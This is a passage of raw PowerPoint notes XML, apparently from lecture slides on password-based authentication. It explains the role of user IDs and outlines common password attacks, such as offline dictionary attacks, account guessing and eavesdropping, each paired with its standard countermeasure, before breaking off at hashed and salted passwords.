                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8ACE7528-B635-477F-BF89-849391633A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MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>The front line of defense against intruders is the password system. Virtually all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>multiuser systems require that a user provide not only a name or identifier (ID)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>but also a password. The password serves to authenticate the ID of the individual</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>logging on to the system. In turn, the ID provides security in the following</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>ways: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The ID determines whether the user is authorized to gain access to a system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>In some systems, only those who already have an ID filed on the system are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>allowed to gain access.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The ID determines the privileges accorded to the user. A few users may have</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>supervisory or “superuser” status that enables them to read files and perform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>functions that are especially protected by the operating system. Some systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>have guest or anonymous accounts, and users of these accounts have more</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>limited privileges than others.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The ID is used in what is referred to as discretionary access control. For</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>example, by listing the IDs of the other users, a user may grant permission to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>them to read files owned by that user.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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1031">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB89FB66-981D-498D-9284-A71717D67F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0C3CDCFC-88E0-4236-9A44-F2C3908E9215}" type="slidenum">
              <a:rPr lang="en-AU" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>186</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-CN" sz="1200">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235523" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2019FFC8-F317-47A1-AA8B-1C5FF71B89C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235524" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F753056-E467-4605-9F04-D252DEBCBB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MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>In this subsection, we outline the main forms of attack against password-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>authentication and briefly outline a countermeasure strategy. The remainder of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Section 11.3 goes into more detail on the key countermeasures.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Typically, a system that uses password-based authentication maintains a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>password file indexed by user ID. One technique that is typically used is to store</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>not the user’s password but a one-way hash function of the password, as described</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>subsequently.</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We can identify the following attack strategies and countermeasures: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Offline dictionary attack:  Typically, strong access controls are used to protect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>the system’s password file. However, experience shows that determined</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>hackers can frequently bypass such controls and gain access to the file. The</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>attacker obtains the system password file and compares the password hashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>against hashes of commonly used passwords. If a match is found, the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>can gain access by that ID/password combination. Countermeasures include</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>controls to prevent unauthorized access to the password file, intrusion detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>measures to identify a compromise, and rapid reissuance of passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>should the password file be compromised.</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Specific account attack:  The attacker targets a specific account and submits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>password guesses until the correct password is discovered. The standard countermeasure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>is an account lockout mechanism, which locks out access to the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>account after a number of failed login attempts. Typical practice is no more</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>than five access attempts.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Workstation hijacking:  The attacker waits until a logged-in workstation is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>unattended. The standard countermeasure is automatically logging the workstation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>out after a period of inactivity. Intrusion detection schemes can be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>used to detect changes in user behavior.</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Exploiting user mistakes:  If the system assigns a password, then the user is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>more likely to write it down because it is difficult to remember. This situation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>creates the potential for an adversary to read the written password. A user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>may intentionally share a password, to enable a colleague to share files, for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>example. Also, attackers are frequently successful in obtaining passwords by</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>using social engineering tactics that trick the user or an account manager into</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>revealing a password. Many computer systems are shipped with preconfigured</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>passwords for system administrators. Unless these preconfigured passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> are changed, they are easily guessed. Countermeasures include user training,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>intrusion detection, and simpler passwords combined with another authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>mechanism.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="3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1031">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5494B34D-893E-4B6A-8111-3D1140C491A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6B82AE9-5ADF-49AE-83A8-104F27752597}" type="slidenum">
              <a:rPr lang="en-AU" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>187</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-CN" sz="1200">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237571" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03E3483D-96EF-4205-86F8-0F8E56AD8040}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237572" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8A058E1-4FCE-470D-900F-095D2C953D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MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>• Exploiting multiple password use:  Attacks can also become much more</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>effective or damaging if different network devices share the same or a similar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>password for a given user. Countermeasures include a policy that forbids the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>same or similar password on particular network devices.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Popular password attack:  A variation of the preceding attack is to use a popular</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>password and try it against a wide range of user IDs. A user’s tendency is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>to choose a password that is easily remembered; this unfortunately makes the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>password easy to guess. Countermeasures include policies to inhibit the selection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>by users of common passwords and scanning the IP addresses of authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>requests and client cookies for submission patterns.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Electronic monitoring:  If a password is communicated across a network to log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>on to a remote system, it is vulnerable to eavesdropping. Simple encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>will not fix this problem, because the encrypted password is, in effect, the password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>and can be observed and reused by an adversary.</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Password guessing against single user:  The attacker attempts to gain knowledge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>about the account holder and system password policies and uses that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>knowledge to guess the password. Countermeasures include training in and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>enforcement of password policies that make passwords difficult to guess.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Such policies address the secrecy, minimum length of the password, character</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>set, prohibition against using well-known user identifiers, and length of time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>before the password must be changed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>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1031">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7CD7CB2-DEEB-4421-AC0A-26D2E7D57B8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D9B5F64-64F7-4E20-9819-FA4DF0D5376B}" type="slidenum">
              <a:rPr lang="en-AU" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>188</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-CN" sz="1200">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239619" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AB774CD-D93B-4066-97AC-A6083BD26C6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239620" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02362419-8378-4F6B-9D27-377B81927A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MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>A widely used password security technique is the use of hashed passwords and a salt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>value. This scheme is found on virtually all UNIX variants as well as on a number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>of other operating systems. The following procedure is employed (Figure 11.6a). To</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
